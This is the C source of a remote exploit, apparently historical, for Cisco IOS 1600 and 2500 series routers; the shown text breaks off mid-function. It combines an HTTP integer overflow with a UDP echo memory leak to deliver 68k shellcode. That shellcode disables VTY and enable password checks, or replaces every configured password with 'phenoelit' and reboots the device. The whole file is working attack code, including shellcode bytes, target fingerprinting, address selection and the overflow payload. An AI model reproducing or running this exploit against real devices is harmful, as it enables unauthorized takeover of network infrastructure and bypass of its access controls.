* | CISCO CASUM EST |
* \.. ../
* ~~---==(MMIII)==---~~
*
*
* Cisco IOS 12.x/11.x remote exploit for HTTP integer overflow in URL using
* IOS 11.x UDP Echo memory leak for shellcode placing and address calculation.
*
* This code does support exploitation of any 11.x Cisco 1600 and 2500 series
* running "ip http server" and "service udp-small-servers". In other words,
* port 80 TCP and port 7 UDP have to be open. The exploitation will take a
* very long time since the overflow is triggered by sending 2 Gigabytes of
* data to the device. Depending on your connection to the target, this may
* take up to several DAYS.
*
* Shellcodes:
* o In case a 1600 running 11.3(11b) IP only is detected, a runtime IOS
* patching shellcode is used. After that, the device will no longer
* validate VTY and enable access passwords. Mission accomplished.
* o In case of any other 11.x IOS or in case it runs from flash where
* code patching is more complicated, the shellcode will replace all
* passwords in the config with "phenoelit" and reboot the box. Change
* the passwords in the shellcodes if you like.
*
* ---
* FX of Phenoelit <fx at phenoelit.de>
*
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <rpc/types.h>
#include <netdb.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include "protocols.h"
#include "packets.h"
char m68nop[] = "\x4E\x71";
char returncode[] =
"\x24\x7c\x02\x0b\xfe\x30" //moveal #34340400,%a2 (0x00000000)
"\x34\xbc\x4e\x75" //movew #20085,%a2@ (0x00000006)
"\x24\x7c\x02\x04\xae\xfa" //moveal #33861370,%a2 (0x0000000A)
"\x24\xfc\x30\x3c\x00\x01" //movel #809238529,%a2@+ (0x00000010)
"\x24\xfc\x4c\xee\x04\x0c" //movel #1290667020,%a2@+ (0x00000016)
"\x24\xfc\xff\xf4\x4e\x5e" //movel #-766370,%a2@+ (0x0000001C)
"\x24\xfc\x4e\x75\x00\x00" //movel #1316290560,%a2@+ (0x00000022)
"\x24\x7c\x02\x07\x21\x6a" //moveal #34021738,%a2 (0x00000028)
"\x34\xbc\x4e\x71" //movew #20081,%a2@ (0x0000002E)
"\x24\x4f" //moveal %sp,%a2 (0x00000032)
"\x0c\x1f\x00\x02" //cmpib #2,%sp@+ (0x00000034)
"\x0c\x97\x02\x19\xfc\xc0" //cmpil #35257536,%sp@ (0x00000038)
"\x66\x00\xff\xf4" //bnew 34 <findret> (0x0000003E)
"\x24\x8f" //movel %sp,%a2@ (0x00000042)
"\x59\x92" //subql #4,%a2@ (0x00000044)
"\x2c\x52" //moveal %a2@,%fp (0x00000046)
"\x42\x80" //clrl %d0 (0x00000048)
"\x4c\xee\x04\x00\xff\xfc" //moveml %fp@(-4),%a2 (0x0000004A)
"\x4e\x5e" //unlk %fp (0x00000050)
"\x4e\x75" //rts (0x00000052)
;
char modcfg[] =
"\x20\x7c\x0f\xf0\x10\xc2" //moveal #267391170,%a0 (0x00000000)
"\xe2\xd0" //lsrw %a0@ (0x00000006)
"\x46\xfc\x27\x00" //movew #9984,%sr (0x00000008)
"\x20\x7c\x0f\xf0\x10\xc2" //moveal #267391170,%a0 (0x0000000C)
"\x30\xbc\x00\x01" //movew #1,%a0@ (0x00000012)
"\x20\x7c\x0e\x00\x00\x00" //moveal #234881024,%a0 (0x00000016)
"\x54\x88" //addql #2,%a0 (0x0000001C)
"\x0c\x50\xab\xcd" //cmpiw #-21555,%a0@ (0x0000001E)
"\x66\xf8" //bnes 1c <find_magic> (0x00000022)
"\x22\x48" //moveal %a0,%a1 (0x00000024)
"\x58\x89" //addql #4,%a1 (0x00000026)
"\x24\x49" //moveal %a1,%a2 (0x00000028)
"\x50\x8a" //addql #8,%a2 (0x0000002A)
"\x50\x8a" //addql #8,%a2 (0x0000002C)
"\x0c\x12\x00\x00" //cmpib #0,%a2@ (0x0000002E)
"\x67\x28" //beqs 5c <end_of_config> (0x00000032)
"\x4b\xfa\x00\xc6" //lea %pc@(fc <S_password>),%a5 (0x00000034)
"\x61\x5a" //bsrs 94 <strstr> (0x00000038)
"\x4a\x80" //tstl %d0 (0x0000003A)
"\x67\x08" //beqs 46 <next1> (0x0000003C)
"\x28\x40" //moveal %d0,%a4 (0x0000003E)
"\x4b\xfa\x00\xcf" //lea %pc@(111 <REPLACE_password>),%a5 (0x00000040)
"\x61\x62" //bsrs a8 <nvcopy> (0x00000044)
"\x4b\xfa\x00\xc0" //lea %pc@(108 <S_enable>),%a5 (0x00000046)
"\x61\x48" //bsrs 94 <strstr> (0x0000004A)
"\x4a\x80" //tstl %d0 (0x0000004C)
"\x67\x08" //beqs 58 <next2> (0x0000004E)
"\x28\x40" //moveal %d0,%a4 (0x00000050)
"\x4b\xfa\x00\xc8" //lea %pc@(11c <REPLACE_enable>),%a5 (0x00000052)
"\x61\x50" //bsrs a8 <nvcopy> (0x00000056)
"\x52\x8a" //addql #1,%a2 (0x00000058)
"\x60\xd2" //bras 2e <modmain> (0x0000005A)
"\x32\xbc\x00\x00" //movew #0,%a1@ (0x0000005C)
"\x7e\x01" //moveq #1,%d7 (0x00000060)
"\x2c\x3c\x00\x00\xff\xff" //movel #65535,%d6 (0x00000062)
"\x9d\x47" //subxw %d7,%d6 (0x00000068)
"\x6b\xfc" //bmis 68 <chksm_delay> (0x0000006A)
"\x2a\x48" //moveal %a0,%a5 (0x0000006C)
"\x61\x50" //bsrs c0 <chksum> (0x0000006E)
"\x32\x86" //movew %d6,%a1@ (0x00000070)
"\x7e\x01" //moveq #1,%d7 (0x00000072)
"\x28\x3c\x00\x00\xff\xff" //movel #65535,%d4 (0x00000074)
"\x99\x47" //subxw %d7,%d4 (0x0000007A)
"\x6b\xfc" //bmis 7a <final_delay> (0x0000007C)
"\x46\xfc\x27\x00" //movew #9984,%sr (0x0000007E)
"\x20\x7c\x0f\xf0\x00\x00" //moveal #267386880,%a0 (0x00000082)
"\x2e\x50" //moveal %a0@,%sp (0x00000088)
"\x20\x7c\x0f\xf0\x00\x04" //moveal #267386884,%a0 (0x0000008A)
"\x20\x50" //moveal %a0@,%a0 (0x00000090)
"\x4e\xd0" //jmp %a0@ (0x00000092)
"\x28\x4a" //moveal %a2,%a4 (0x00000094)
"\x0c\x15\x00\x00" //cmpib #0,%a5@ (0x00000096)
"\x67\x08" //beqs a4 <strstr_endofstr> (0x0000009A)
"\xb9\x0d" //cmpmb %a5@+,%a4@+ (0x0000009C)
"\x67\xf6" //beqs 96 <strstr_2> (0x0000009E)
"\x42\x80" //clrl %d0 (0x000000A0)
"\x4e\x75" //rts (0x000000A2)
"\x20\x0c" //movel %a4,%d0 (0x000000A4)
"\x4e\x75" //rts (0x000000A6)
"\x7e\x01" //moveq #1,%d7 (0x000000A8)
"\x0c\x15\x00\x00" //cmpib #0,%a5@ (0x000000AA)
"\x67\x0e" //beqs be <nvcopy_end> (0x000000AE)
"\x18\xdd" //moveb %a5@+,%a4@+ (0x000000B0)
"\x2c\x3c\x00\x00\xff\xff" //movel #65535,%d6 (0x000000B2)
"\x9d\x47" //subxw %d7,%d6 (0x000000B8)
"\x6b\xfc" //bmis b8 <nvcopy_delay> (0x000000BA)
"\x60\xec" //bras aa <nvcopyl1> (0x000000BC)
"\x4e\x75" //rts (0x000000BE)
"\x42\x87" //clrl %d7 (0x000000C0)
"\x42\x80" //clrl %d0 (0x000000C2)
"\x0c\x55\x00\x00" //cmpiw #0,%a5@ (0x000000C4)
"\x66\x0a" //bnes d4 <chk_hack> (0x000000C8)
"\x52\x80" //addql #1,%d0 (0x000000CA)
"\x0c\x80\x00\x00\x00\x0a" //cmpil #10,%d0 (0x000000CC)
"\x67\x08" //beqs dc <chk2> (0x000000D2)
"\x42\x86" //clrl %d6 (0x000000D4)
"\x3c\x1d" //movew %a5@+,%d6 (0x000000D6)
"\xde\x86" //addl %d6,%d7 (0x000000D8)
"\x60\xe8" //bras c4 <chk1> (0x000000DA)
"\x2c\x07" //movel %d7,%d6 (0x000000DC)
"\x2a\x07" //movel %d7,%d5 (0x000000DE)
"\x02\x86\x00\x00\xff\xff" //andil #65535,%d6 (0x000000E0)
"\xe0\x8d" //lsrl #8,%d5 (0x000000E6)
"\xe0\x8d" //lsrl #8,%d5 (0x000000E8)
"\xdc\x45" //addw %d5,%d6 (0x000000EA)
"\x28\x06" //movel %d6,%d4 (0x000000EC)
"\x02\x84\xff\xff\x00\x00" //andil #-65536,%d4 (0x000000EE)
"\x66\x00\xff\xea" //bnew e0 <chk3> (0x000000F4)
"\x46\x46" //notw %d6 (0x000000F8)
"\x4e\x75" //rts (0x000000FA)
"\x0a"" password ""\x00"
"\x0a""enable ""\x00"
"phenoelit\x0a""\x00"
"password phenoelit\x0a""\x00"
;
char modcfg2k5[] =
"\x46\xfc\x27\x00" //movew #9984,%sr (0x00000000)
"\x20\x7c\x02\x00\x00\x00" //moveal #33554432,%a0 (0x00000004)
"\x54\x88" //addql #2,%a0 (0x0000000A)
"\x0c\x50\xab\xcd" //cmpiw #-21555,%a0@ (0x0000000C)
"\x66\xf8" //bnes a <find_magic> (0x00000010)
"\x22\x48" //moveal %a0,%a1 (0x00000012)
"\x58\x89" //addql #4,%a1 (0x00000014)
"\x24\x49" //moveal %a1,%a2 (0x00000016)
"\x50\x8a" //addql #8,%a2 (0x00000018)
"\x50\x8a" //addql #8,%a2 (0x0000001A)
"\x0c\x12\x00\x00" //cmpib #0,%a2@ (0x0000001C)
"\x67\x28" //beqs 4a <end_of_config> (0x00000020)
"\x4b\xfa\x00\xd6" //lea %pc@(fa <S_password>),%a5 (0x00000022)
"\x61\x6a" //bsrs 92 <strstr> (0x00000026)
"\x4a\x80" //tstl %d0 (0x00000028)
"\x67\x08" //beqs 34 <next1> (0x0000002A)
"\x28\x40" //moveal %d0,%a4 (0x0000002C)
"\x4b\xfa\x00\xdf" //lea %pc@(10f <REPLACE_password>),%a5 (0x0000002E)
"\x61\x72" //bsrs a6 <nvcopy> (0x00000032)
"\x4b\xfa\x00\xd0" //lea %pc@(106 <S_enable>),%a5 (0x00000034)
"\x61\x58" //bsrs 92 <strstr> (0x00000038)
"\x4a\x80" //tstl %d0 (0x0000003A)
"\x67\x08" //beqs 46 <next2> (0x0000003C)
"\x28\x40" //moveal %d0,%a4 (0x0000003E)
"\x4b\xfa\x00\xd8" //lea %pc@(11a <REPLACE_enable>),%a5 (0x00000040)
"\x61\x60" //bsrs a6 <nvcopy> (0x00000044)
"\x52\x8a" //addql #1,%a2 (0x00000046)
"\x60\xd2" //bras 1c <modmain> (0x00000048)
"\x42\x80" //clrl %d0 (0x0000004A)
"\x2a\x49" //moveal %a1,%a5 (0x0000004C)
"\x52\x00" //addqb #1,%d0 (0x0000004E)
"\x1a\xfc\x00\x00" //moveb #0,%a5@+ (0x00000050)
"\x7e\x01" //moveq #1,%d7 (0x00000054)
"\x2c\x3c\x00\x00\xff\xff" //movel #65535,%d6 (0x00000056)
"\x9d\x47" //subxw %d7,%d6 (0x0000005C)
"\x6b\xfc" //bmis 5c <chksm_delay> (0x0000005E)
"\x0c\x00\x00\x02" //cmpib #2,%d0 (0x00000060)
"\x66\xe8" //bnes 4e <chksm_del> (0x00000064)
"\x2a\x48" //moveal %a0,%a5 (0x00000066)
"\x61\x54" //bsrs be <chksum> (0x00000068)
"\x2a\x49" //moveal %a1,%a5 (0x0000006A)
"\x52\x8d" //addql #1,%a5 (0x0000006C)
"\x42\x80" //clrl %d0 (0x0000006E)
"\x52\x00" //addqb #1,%d0 (0x00000070)
"\x1a\x86" //moveb %d6,%a5@ (0x00000072)
"\x7e\x01" //moveq #1,%d7 (0x00000074)
"\x28\x3c\x00\x00\xff\xff" //movel #65535,%d4 (0x00000076)
"\x99\x47" //subxw %d7,%d4 (0x0000007C)
"\x6b\xfc" //bmis 7c <final_delay> (0x0000007E)
"\xe0\x4e" //lsrw #8,%d6 (0x00000080)
"\x2a\x49" //moveal %a1,%a5 (0x00000082)
"\x0c\x00\x00\x02" //cmpib #2,%d0 (0x00000084)
"\x66\xe6" //bnes 70 <final_wr> (0x00000088)
"\x20\x7c\x03\x00\x00\x60" //moveal #50331744,%a0 (0x0000008A)
"\x4e\xd0" //jmp %a0@ (0x00000090)
"\x28\x4a" //moveal %a2,%a4 (0x00000092)
"\x0c\x15\x00\x00" //cmpib #0,%a5@ (0x00000094)
"\x67\x08" //beqs a2 <strstr_endofstr> (0x00000098)
"\xb9\x0d" //cmpmb %a5@+,%a4@+ (0x0000009A)
"\x67\xf6" //beqs 94 <strstr_2> (0x0000009C)
"\x42\x80" //clrl %d0 (0x0000009E)
"\x4e\x75" //rts (0x000000A0)
"\x20\x0c" //movel %a4,%d0 (0x000000A2)
"\x4e\x75" //rts (0x000000A4)
"\x7e\x01" //moveq #1,%d7 (0x000000A6)
"\x0c\x15\x00\x00" //cmpib #0,%a5@ (0x000000A8)
"\x67\x0e" //beqs bc <nvcopy_end> (0x000000AC)
"\x18\xdd" //moveb %a5@+,%a4@+ (0x000000AE)
"\x2c\x3c\x00\x00\xff\xff" //movel #65535,%d6 (0x000000B0)
"\x9d\x47" //subxw %d7,%d6 (0x000000B6)
"\x6b\xfc" //bmis b6 <nvcopy_delay> (0x000000B8)
"\x60\xec" //bras a8 <nvcopyl1> (0x000000BA)
"\x4e\x75" //rts (0x000000BC)
"\x42\x87" //clrl %d7 (0x000000BE)
"\x42\x80" //clrl %d0 (0x000000C0)
"\x0c\x55\x00\x00" //cmpiw #0,%a5@ (0x000000C2)
"\x66\x0a" //bnes d2 <chk_hack> (0x000000C6)
"\x52\x80" //addql #1,%d0 (0x000000C8)
"\x0c\x80\x00\x00\x00\x14" //cmpil #20,%d0 (0x000000CA)
"\x67\x08" //beqs da <chk2> (0x000000D0)
"\x42\x86" //clrl %d6 (0x000000D2)
"\x3c\x1d" //movew %a5@+,%d6 (0x000000D4)
"\xde\x86" //addl %d6,%d7 (0x000000D6)
"\x60\xe8" //bras c2 <chk1> (0x000000D8)
"\x2c\x07" //movel %d7,%d6 (0x000000DA)
"\x2a\x07" //movel %d7,%d5 (0x000000DC)
"\x02\x86\x00\x00\xff\xff" //andil #65535,%d6 (0x000000DE)
"\xe0\x8d" //lsrl #8,%d5 (0x000000E4)
"\xe0\x8d" //lsrl #8,%d5 (0x000000E6)
"\xdc\x45" //addw %d5,%d6 (0x000000E8)
"\x28\x06" //movel %d6,%d4 (0x000000EA)
"\x02\x84\xff\xff\x00\x00" //andil #-65536,%d4 (0x000000EC)
"\x66\x00\xff\xea" //bnew de <chk3> (0x000000F2)
"\x46\x46" //notw %d6 (0x000000F6)
"\x4e\x75" //rts (0x000000F8)
"\x0a"" password ""\x00"
"\x0a""enable ""\x00"
"phenoelit\x0a""\x00"
"password phenoelit\x0a""\x00"
;
//
// address selection strategies
//
#define S_RANDOM 1
#define S_LAST 2
#define S_SMALLEST 3
#define S_HIGHEST 4
#define S_FREQUENT 5
typedef struct {
unsigned int a;
unsigned int count;
} addrs_t;
#define LOW_ADDR_THR 5
#define LOW_COUNT_THR 3
//
// IO memory block header based fingerprinting
//
static struct {
unsigned int PC_start;
unsigned int PC_end;
unsigned int IO_start;
unsigned int IO_end;
char *name;
unsigned char *code;
unsigned int codelen;
unsigned char *nop;
unsigned int noplen;
unsigned int fakefp;
} cisco_boxes[] = {
{0x08000000, 0x08ffffff, 0x02C00000, 0x02FFFFFF,
"Cisco 1600 series, run from Flash",
modcfg, sizeof(modcfg)-1,
m68nop, sizeof(m68nop)-1 ,
0x02f0f1f2
},
{0x0208F600, 0x0208F93C, 0x02C00000, 0x02FFFFFF,
"Cisco 1603, 11.3(11b) IP only, run from RAM",
returncode, sizeof(returncode)-1,
m68nop, sizeof(m68nop)-1 ,
0x02f0f1f2
},
{0x03000000, 0x037FFFFF, 0x00E00000, 0x00FFFFFF,
"Cisco 2500 series, run from Flash",
modcfg2k5, sizeof(modcfg2k5)-1,
m68nop, sizeof(m68nop)-1,
0x00079000
},
{0,0,0,0,NULL,NULL,0,NULL,0,0}
};
// ***************** Status and other tracking *******************
//
// HTTP communication
//
struct {
int sfd;
unsigned int done;
} http;
//
// UDP leak
//
#define MAXADDRS 100
#define DEFAULTRUNS 206
#define LOCALPORT 31336 // almost 31337 ;)
#define PACKETMAX 1400
struct {
int sfd;
int udpsfd;
int guess;
addrs_t addrs[MAXADDRS];
unsigned int addrc;
unsigned int lastaddr;
int nop_offset;
int nop_sled;
} leak;
//
// config
//
struct {
char *device;
char *target;
struct in_addr target_addr;
int verbose;
int testmode;
int strategy;
unsigned int leakme;
unsigned int timeout;
unsigned int leakruns;
} cfg;
//
// function prototypes
//
void usage(char *s);
void *smalloc(size_t s);
int HTTPpre(void);
void HTTPsend(char *what);
int IOSlack(unsigned int runs, int shellcode);
unsigned char *UDPecho( unsigned int *plen,
unsigned char *payload, unsigned int payload_len);
void UDPanalyze(unsigned char *b, unsigned int len,
unsigned char *expected, unsigned int expected_length);
unsigned int SelectAddress(void);
int CheckForbidden(unsigned int address);
// *************************** main code *************************
int main(int argc, char **argv) {
//
// HTTP elements
//
char token6[] ="/Cisco";
char token50[]="/AnotherLemmingAndAntoherLemmingAndAnotherLemmingX";
char token48[]="/HereComesTheFinalLemmingAndClosesTheGapForever/";
char httpend[]=" HTTP/1.0\r\n\r\n";
char overflow[30];
//
// stuff we need
//
unsigned int i;
int saved_guess;
unsigned int retaddr;
//
// command line
//
char option;
extern char *optarg;
//
// output stuff
//
double percent;
double lpercent=(double)0;
memset(&cfg,0,sizeof(cfg));
memset(&leak,0,sizeof(leak));
memset(&http,0,sizeof(http));
//
// set defaults
//
cfg.leakme=0x4C00;
cfg.timeout=3;
cfg.leakruns=DEFAULTRUNS;
cfg.strategy=S_SMALLEST;
while ((option=getopt(argc,argv,"vTA:t:L:R:d:i:"))!=EOF) {
switch(option) {
case 'v': cfg.verbose++;
break;
case 'T': cfg.testmode++;
break;
case 'A': cfg.strategy=(int)strtoul(optarg,(char **)NULL,10);
break;
case 't': cfg.timeout=(int)strtoul(optarg,(char **)NULL,10);
break;
case 'L': cfg.leakme=(int)strtoul(optarg,(char **)NULL,10);
break;
case 'R': cfg.leakruns=(int)strtoul(optarg,(char **)NULL,10);
break;
case 'd': {
struct hostent *he;
if ((he=gethostbyname(optarg))==NULL) {
fprintf(stderr,"Could not resolve %s\n",cfg.target);
return (-1);
}
bcopy(he->h_addr,
(char *)&(cfg.target_addr.s_addr),
he->h_length);
cfg.target=smalloc(strlen(optarg)+1);
strcpy(cfg.target,optarg);
}
break;
case 'i': cfg.device=smalloc(strlen(optarg)+1);
strcpy(cfg.device,optarg);
break;
default: usage(argv[0]);
// does not return
}
}
//
// idiot check
//
if ( !(cfg.device && *((u_int32_t *)&(cfg.target_addr)) ))
usage(argv[0]);
//
// verify the UDP leak and make sure it's a known box
//
if (IOSlack(1,-1)!=0) {
fprintf(stderr,"You need an IOS 11.x target with UDP echo service enabled\n"
"for this thing to work. Obviously, you don't have that.\n");
return (1);
}
if (leak.guess==(-1)) {
fprintf(stderr,"Apparently, you got a good target, but it's not one of the\n"
"platforms we got code for. Life sucks.\n");
return (1);
} else {
printf("Target identified as '%s'.\n",cisco_boxes[leak.guess].name);
if (cfg.verbose) {
printf("Using the following code:\n");
hexdump(cisco_boxes[leak.guess].code,
cisco_boxes[leak.guess].codelen);
}
saved_guess=leak.guess;
}
if (leak.lastaddr == 0) {
printf("The memory leak data did not contain enough information to\n"
"calculate the addresses correctly. The router may be busy,\n"
"in which case this method is likely to fail!\n");
return (2);
} else {
printf("Calculated address in test: 0x%08X\n",leak.lastaddr);
}
//
// Connect to HTTP server and send the first "GET "
//
if (HTTPpre()!=0) return 1;
//
// fill normal buffer
//
printf("Sending token50 x 0x5 + token6 ...\n");
HTTPsend(token50);
HTTPsend(token50);
HTTPsend(token50);
HTTPsend(token50);
HTTPsend(token50);
HTTPsend(token6);
//
// send enough data to overflow the counter
//
i=1;
printf("Sending token50 x 0x28F5C28 (2 Gigabytes of data)...\n");
while (i<=0x28F5C28) {
if (!cfg.testmode) HTTPsend(token50);
http.done+=50;
i++;
//
// output
//
percent = (double)http.done / (double)0x80000000;
if ( percent > lpercent+0.0001 ) {
printf("%5.2f%% done\n",percent * 100);
lpercent=percent;
}
}
printf("Sending final token48 ...\n");
HTTPsend(token48);
//
// Use infoleak to transfer code and calculate address
//
memset(&leak,0,sizeof(leak));
if (IOSlack(cfg.leakruns,saved_guess)!=0) {
fprintf(stderr,"Your target does no longer leak memory. This could have\n"
"several reasons, but it sure prevents you from exploiting it.\n");
return (-1);
} else {
printf("Aquired %u addresses with our code\n",leak.addrc);
if (leak.addrc<LOW_ADDR_THR) {
printf( "WARNING: This is a low number of addresses.\n"
" The target is probably busy!!\n");
}
}
if (saved_guess!=leak.guess)
printf("Errrmmm... your target type changed. Just so you know, \n"
"it's not supposed to do that\n");
//
// prepare the overflow buffer
//
printf("Selecting address, using nop sled of %u and offset in the sled of %u\n",
leak.nop_sled, leak.nop_offset);
if ( (retaddr=SelectAddress()) == 0) return (-1);
memset(&overflow,0,sizeof(overflow));
sprintf(overflow,
"BB%%%02X%%%02X%%%02X%%%02X%%%02X%%%02X%%%02X%%%02X"
,
(unsigned char)( (cisco_boxes[saved_guess].fakefp>>24)&0xFF),
(unsigned char)( (cisco_boxes[saved_guess].fakefp>>16)&0xFF),
(unsigned char)( (cisco_boxes[saved_guess].fakefp>> 8)&0xFF),
(unsigned char)( (cisco_boxes[saved_guess].fakefp )&0xFF),
(unsigned char)( (retaddr>>24)&0xFF),
(unsigned char)( (retaddr>>16)&0xFF),
(unsigned char)( (retaddr>> 8)&0xFF),
(unsigned char)( (retaddr )&0xFF));
if (cfg.verbose) hexdump(overflow,sizeof(overflow)-1);
//
// perform overflow and overwrite return address
//
printf("Sending overflow of %u bytes\n",strlen(overflow));
HTTPsend(overflow);
printf("Sending final HTTP/1.0\n");
HTTPsend(httpend);
close(http.sfd);
//
// all done
//
return 0;
}
void usage(char *s) {
fprintf(stderr,"Usage: %s -i <interface> -d <target> [-options]\n",s);
fprintf(stderr,"Options are:\n"
"-v Verbose mode.\n"
"-T Test mode, don't really exploit\n"
"-An Address selection strategy. Values are:\n"
" 1 (random), 2 (last), 3 (smallest), 4 (highest), 5 (most frequent)\n"
"-tn Set timeout for info leak to n seconds\n"
"-Ln Set requested memory leak to n bytes\n"
"-Rn Set number of final leak runs to n\n"
);
exit (1);
}
//
// *********************** HTTP related **************************
//
int HTTPpre(void) {
char get[] = "GET ";
struct sockaddr_in sin;
struct hostent *he;
memset(&sin,0,sizeof(struct sockaddr_in));
if ((he=gethostbyname(cfg.target))==NULL) {
fprintf(stderr,"Could not resolve %s\n",cfg.target);
return (-1);
}
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
bcopy(he->h_addr,(char *)&sin.sin_addr,he->h_length);
bzero(&(sin.sin_zero),8);
if ((http.sfd=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP) )<0) {
fprintf(stderr,"socket(TCP) error\n");
return(-1);
}
printf("Connecting to HTTP server on %s ...\n",cfg.target);
if (connect(http.sfd,(struct sockaddr *)&sin,sizeof(sin))<0) {
fprintf(stderr,"Failed to connect to HTTP\n");
return (-1);
}
printf("Connected!\n");
//
// send "GET "
//
HTTPsend(get);
return 0;
}
void HTTPsend(char *what) {
if (send(http.sfd,what,strlen(what),0)<0) {
fprintf(stderr,"send() failed!\n");
exit(-1);
}
}
//
// *********************** UDP related **************************
//
int IOSlack(unsigned int runs, int shellcode) {
//
// the leak packet
//
#define DUMMY_SIZE 512
unsigned char *packet;
unsigned int length;
char dummy[DUMMY_SIZE];
unsigned char *sc,*st;
unsigned int sclen;
//
// recv stuff
//
char *rbuf;
unsigned int rx;
//
// doing the stuff
//
unsigned int r;
struct sockaddr_in frm;
int frmlen=sizeof(struct sockaddr_in);
fd_set rfds;
struct timeval tv;
int select_ret;
int recvflag;
struct sockaddr_in myself;
//
// init
//
leak.guess=(-1);
r=runs;
recvflag=0;
st=NULL;
//
// get the sockets
//
if ( (leak.sfd=init_socket_IP4(cfg.device,1)) == (-1) ) {
fprintf(stderr,"Couldn't grab a raw socket\n");
return (-1);
}
myself.sin_family=AF_INET;
myself.sin_port=htons(LOCALPORT);
myself.sin_addr.s_addr=INADDR_ANY;
if ( (leak.udpsfd=socket(PF_INET,SOCK_DGRAM,IPPROTO_UDP )) <0) {
fprintf(stderr,"Couldn't grab a UDP socket\n");
return (-1);
}
if ( bind(leak.udpsfd,(struct sockaddr *)&myself,sizeof(struct sockaddr)) != 0) {
fprintf(stderr,"bind() failed\n");
return (-1);
}
//
// determine packet contents and make a packet
//
if (shellcode==(-1)) {
memset(&dummy,0x50,DUMMY_SIZE-1);
dummy[DUMMY_SIZE-1]=0x00;
sc=dummy;
sclen=DUMMY_SIZE-1;
} else {
unsigned char *t;
unsigned int i;
t=sc=st=smalloc(PACKETMAX);
//
// calculate the remaining space for nops
//
leak.nop_sled=PACKETMAX-cisco_boxes[shellcode].codelen;
//
// align
//
while ( (leak.nop_sled % cisco_boxes[shellcode].noplen) != 0)
leak.nop_sled--;
for (i=0;i< (leak.nop_sled/cisco_boxes[shellcode].noplen) ;i++) {
memcpy(t,cisco_boxes[shellcode].nop,cisco_boxes[shellcode].noplen);
t+=cisco_boxes[shellcode].noplen;
}
//
// add the real code
//
memcpy(t,cisco_boxes[shellcode].code,cisco_boxes[shellcode].codelen);
t+=cisco_boxes[shellcode].codelen;
sclen=leak.nop_sled + cisco_boxes[shellcode].codelen;
//
// calculate a nop_offset and align
//
leak.nop_offset=leak.nop_sled * 0.8;
while ( (leak.nop_offset % cisco_boxes[shellcode].noplen) != 0)
leak.nop_offset--;
if (cfg.verbose) hexdump(st,sclen);
}
packet=UDPecho(&length,sc,sclen);
//
// allocate receive buffer
//
rbuf=smalloc(cfg.leakme+0x200);
//
// do it
//
printf("Getting IO memory leak data (%u times) ...\n",r);
while (r--) {
sendpack_IP4(leak.sfd,packet,length);
tv.tv_sec=cfg.timeout;
tv.tv_usec=0;
FD_ZERO(&rfds);
FD_SET(leak.udpsfd,&rfds);
select_ret=select(leak.udpsfd+1,&rfds,NULL,NULL,&tv);
if (select_ret>0) {
rx=recvfrom(leak.udpsfd,rbuf,cfg.leakme,0,(struct sockaddr *)&frm,&frmlen);
if (rx<0) {
fprintf(stderr,"UDP recvfrom() failed\n");
return (-1);
}
if (cfg.verbose) printf("Received %u bytes data\n",rx);
if (cfg.verbose>1) hexdump(rbuf,rx);
recvflag=1;
//
// analyze what we got
//
UDPanalyze(rbuf,rx,sc,sclen);
} else {
printf("Timeout at %u - may be lost packet?\n",r);
}
}
//
// clean up
//
free(packet);
free(rbuf);
if (st!=NULL) free(st);
close(leak.sfd);
close(leak.udpsfd);
if (cfg.verbose==0) printf("\n"); // be nice
if (recvflag) { return 0; } else { return 1; }
}
unsigned char *UDPecho(
unsigned int *plen, // returned length of packet
unsigned char *payload, // pointer to payload
unsigned int payload_len // length of payload
) {
unsigned char *pack;
iphdr_t *ip;
udphdr_t *udp;
u_char *pay;
u_char *t;
u_int16_t cs;
*plen=sizeof(iphdr_t)+sizeof(udphdr_t)+payload_len ;
pack=smalloc(*plen+10);
ip=(iphdr_t *)pack;
ip->version=4;
ip->ihl=sizeof(iphdr_t)/4;
ip->ttl=0x80;
ip->protocol=IPPROTO_UDP;
memcpy(&(ip->saddr.s_addr),&(packet_ifconfig.ip.s_addr),IP_ADDR_LEN);
memcpy(&(ip->daddr.s_addr),&(cfg.target_addr),IP_ADDR_LEN);
udp=(udphdr_t *)((void *)ip+sizeof(iphdr_t));
udp->sport=htons(LOCALPORT);
udp->dport=htons(7);
udp->length=htons(cfg.leakme);
pay=(u_char *)((void *)udp+sizeof(udphdr_t));
t=pay;
memcpy(pay,payload,payload_len);
t+=payload_len;
ip->tot_len=htons(*plen);
cs=chksum((u_char *)ip,sizeof(iphdr_t));
ip->check=cs;
if (cfg.verbose>1) hexdump(pack,*plen);
return pack;
}
void UDPanalyze(unsigned char *b, unsigned int len,
unsigned char *expected, unsigned int expected_length) {
#define ST_MAGIC 1
#define ST_PID 2
#define ST_CHECK 3
#define ST_NAME 4
#define ST_PC 5
#define ST_NEXT 6
#define ST_PREV 7
#define ST_SIZE 8
#define ST_REF 9
#define ST_LASTDE 10
#define ST_ID_ME_NOW 100
unsigned char *p;
int state=0;
int i=0;
unsigned char *opcode_begin;
unsigned char *block2_next_field;
unsigned int block3_next_val;
unsigned int p_name;
unsigned int p_pc;
unsigned int p_next;
unsigned int p_prev;
opcode_begin=NULL;
block2_next_field=NULL;
block3_next_val=0;
if ((!memcmp(b,expected,expected_length))) {
if (cfg.verbose>1) printf("Payload found!\n");
opcode_begin=b;
}
p=b;
while ((b+len-4)>p) {
if ( (p[0]==0xfd) && (p[1]==0x01) && (p[2]==0x10) && (p[3]==0xDF) ) {
if (cfg.verbose>1) printf("REDZONE MATCH!\n");
else { printf("!"); fflush(stdout); }
state=ST_MAGIC;
p+=4;
}
switch (state) {
case ST_MAGIC:
if (cfg.verbose)
printf("MEMORY BLOCK\n");
state++;
p+=4;
break;
case ST_PID:
if (cfg.verbose)
printf("\tPID : %08X\n",ntohl(*(unsigned int *)p));
state++;
p+=4;
break;
case ST_CHECK:
if (cfg.verbose)
printf("\tAlloc Check: %08X\n",ntohl(*(unsigned int *)p));
state++;
p+=4;
break;
case ST_NAME:
p_name=ntohl(*(unsigned int *)p);
if (cfg.verbose)
printf("\tAlloc Name : %08X\n",p_name);
state++;
p+=4;
break;
case ST_PC:
p_pc=ntohl(*(unsigned int *)p);
if (cfg.verbose)
printf("\tAlloc PC : %08X\n",p_pc);
state++;
p+=4;
break;
case ST_NEXT:
p_next=ntohl(*(unsigned int *)p);
if (cfg.verbose)
printf("\tNEXT Block : %08X\n",p_next);
if (block2_next_field==NULL) {
if (cfg.verbose) printf("Assigning as block2_next_field\n");
block2_next_field=p;
} else if (block3_next_val==0) {
